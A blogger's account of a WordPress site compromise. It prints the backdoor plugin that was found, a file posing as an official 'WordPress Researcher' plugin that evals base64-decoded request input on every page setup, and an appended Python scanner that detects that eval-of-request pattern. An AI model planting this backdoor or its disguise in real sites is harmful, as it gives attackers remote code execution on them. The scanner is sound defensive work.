Why you should know that I fixed a water leak the other day

Generating content for a few busy WordPress web sites, whilst ensuring that the core, plugins and themes are up to date can sometimes be challenging.

One of the key tools in our arsenal is a plugin called Infinite WP. With Infinite WP I can keep all sites linked to it up to date without visiting the WP Admin panel of each individual site. A virtual assistant that doesn’t go on strike or demand a larger slice of the ‘small’ pie every year.

When Infinite WP loses contact with the client plugin installed on individual WordPress sites it throws out a message in the Infinite WP console that goes like this: “Houston, we have a problem!” Well, actually not really those words but you get my meaning anyway?

One of my busier sites recently lost comms with the Infinite WP console so like a good little boy off I went to see what could be the problem. At this stage of the conversation you need to know that almost 95% of the content on this particular web site is posted via WordPress’ handy little ‘Press This’ function or via the WordPress App on my Android Tablet, so you will appreciate that I don’t have the WP Admin open all the time.

After surviving many hacking attempts I don’t get that sinking feeling in the pit of my stomach anymore after opening up a web site only to see that it has been hacked. In moments of panic us human beings are prone to blame someone else first rather than just tackle and fix a problem. This is normally when, without thinking, the normal person opens a ticket with tech support who then struggle to translate this new language consisting mostly of four letter words and not much else.

Suffice to say my web site had been a victim of a hacker who had placed a plugin in my wp-content plugins folder that had ‘hidden’ all my other plugins (hence the message from Infinite WP) and placed some dodgy code on many pages.

It just so happens that I am hosted by a host (geddit?) of nice guys who have vast experience in this business. It also so happens that the universe decided that I hadn’t had enough troubles for one day so the water pipe running across one of my roofs decided to burst at the same time.

What did I do?

In the old days I would have ignored the water leak and concentrated on fixing the hack.

The new me though handed my problem over to Edward and Robert at Serv Hosting – they looked for a clean backup and restored the site as well as a clean, up-to-date database – all in less time than it took me to fix my water leak.

The backdoor plugin was called research_plugin.php and contained backdoor code hooked to WordPress’ after_setup_theme action:

<?php

/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later – http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4

Copyright 2013  wordpressdotorg

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/

function research_plugin()
{
    if (isset($_REQUEST['CSSl']))
    {
        eval(base64_decode($_REQUEST['CSSl']));
    }
    return;
}

add_action('after_setup_theme', 'research_plugin');
?>
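A way to sweep a plugins folder for this pattern, where request data is passed (optionally through decoders) straight into an execution function. This is an added example, not code from the original post or from Serv Hosting; the function names, the list of decoders and the shortened sample header are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Request superglobals: data the remote client controls.
REQ = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]*\]"
# Decoders commonly wrapped around a payload before it is executed.
DECODE = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|urldecode)"
# An execution sink whose argument is request data, optionally nested in decoders.
SINK = re.compile(
    rf"\b(?:eval|assert|create_function)\s*\(\s*(?:{DECODE}\s*\(\s*)*{REQ}", re.I
)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed sample: the function body shown on this page, header shortened.
SAMPLE = """<?php
/*
Plugin Name: WordPress Researcher
*/
function research_plugin()
{
    if (isset($_REQUEST['CSSl']))
    {
        eval(base64_decode($_REQUEST['CSSl']));
    }
    return;
}
add_action('after_setup_theme', 'research_plugin');
"""

def find_request_eval(php_source):
    """Return [(line_number, matched_text)] for sinks fed by request data."""
    # Blank block comments (keeping newlines) so eval/**/( cannot hide the call.
    code = BLOCK_COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), php_source)
    return [(code.count("\n", 0, m.start()) + 1, m.group()) for m in SINK.finditer(code)]

def scan_plugins(root):
    """Map each PHP file under root that contains a finding to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = find_request_eval(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    result = scan_plugins(sys.argv[1]) if len(sys.argv) > 1 else find_request_eval(SAMPLE)
    print(result)
```

A clean result only means this one pattern is absent; a file that builds the function name or the input indirectly will not match, so a restore from a known-clean backup remains the fix.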
